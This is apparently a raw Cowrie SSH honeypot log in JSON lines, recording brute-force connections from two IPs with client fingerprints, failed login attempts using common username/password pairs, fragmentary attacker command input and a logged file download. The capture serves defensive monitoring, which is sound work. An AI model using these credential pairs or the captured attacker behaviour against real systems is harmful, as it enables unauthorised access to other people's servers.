{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.945835Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.946356Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:53:13.567111Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:13.568109Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:13.569125Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:53:22.646821Z","src_ip":"212.227.125.160","session":"633299299561"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:53:22.648765Z","src_ip":"212.227.125.160","session":"633299299561"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52032,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc3502a6bdde","protocol":"ssh","message":"New connection: 212.227.235.229:52032 (1.2.3.4:22) [session: dc3502a6bdde]","sensor":"my-vps","timestamp":"2025-08-31T04:53:26.537520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:53:26.683723Z","src_ip":"212.227.235.229","session":"dc3502a6bdde"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:53:26.795871Z","src_ip":"212.227.235.229","session":"dc3502a6bdde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52048,"dst_ip":"1.2.3.4","dst_port":22,"session":"335db7321e89","protocol":"ssh","message":"New connection: 212.227.125.160:52048 (1.2.3.4:22) [session: 335db7321e89]","sensor":"my-vps","timestamp":"2025-08-31T04:53:26.993627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:53:26.994294Z","src_ip":"212.227.125.160","session":"335db7321e89"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:53:27.186208Z","src_ip":"212.227.125.160","session":"335db7321e89"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:27.763920Z","src_ip":"212.227.125.160","session":"335db7321e89"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:28.957118Z","src_ip":"212.227.125.160","session":"335db7321e89"}
{"eventid":"cowrie.login.failed","username":"admin","password":"administrator","message":"login attempt [admin/administrator] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:29.316037Z","src_ip":"212.227.235.229","session":"dc3502a6bdde"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:31.983669Z","src_ip":"212.227.235.229","session":"dc3502a6bdde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46812,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a7e73f55c31","protocol":"ssh","message":"New connection: 212.227.235.229:46812 (1.2.3.4:22) [session: 0a7e73f55c31]","sensor":"my-vps","timestamp":"2025-08-31T04:53:33.624844Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:53:33.678802Z","src_ip":"212.227.235.229","session":"0a7e73f55c31"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:53:34.020777Z","src_ip":"212.227.235.229","session":"0a7e73f55c31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41208,"dst_ip":"1.2.3.4","dst_port":22,"session":"43b9dc9914d4","protocol":"ssh","message":"New connection: 212.227.235.229:41208 (1.2.3.4:22) [session: 43b9dc9914d4]","sensor":"my-vps","timestamp":"2025-08-31T04:53:34.030285Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46828,"dst_ip":"1.2.3.4","dst_port":22,"session":"a464dc5f9092","protocol":"ssh","message":"New connection: 212.227.235.229:46828 (1.2.3.4:22) [session: a464dc5f9092]","sensor":"my-vps","timestamp":"2025-08-31T04:53:34.043661Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41222,"dst_ip":"1.2.3.4","dst_port":22,"session":"e71bd23f64e4","protocol":"ssh","message":"New connection: 212.227.235.229:41222 (1.2.3.4:22) [session: e71bd23f64e4]","sensor":"my-vps","timestamp":"2025-08-31T04:53:34.064224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:53:34.246297Z","src_ip":"212.227.235.229","session":"43b9dc9914d4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:53:34.409809Z","src_ip":"212.227.235.229","session":"43b9dc9914d4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:53:34.468012Z","src_ip":"212.227.235.229","session":"e71bd23f64e4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:53:34.590288Z","src_ip":"212.227.235.229","session":"e71bd23f64e4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:53:35.936621Z","src_ip":"212.227.235.229","session":"a464dc5f9092"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:53:36.062759Z","src_ip":"212.227.235.229","session":"a464dc5f9092"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:36.415328Z","src_ip":"212.227.235.229","session":"0a7e73f55c31"}
{"eventid":"cowrie.login.failed","username":"tushar","password":"tushar123","message":"login attempt [tushar/tushar123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:37.117824Z","src_ip":"212.227.235.229","session":"43b9dc9914d4"}
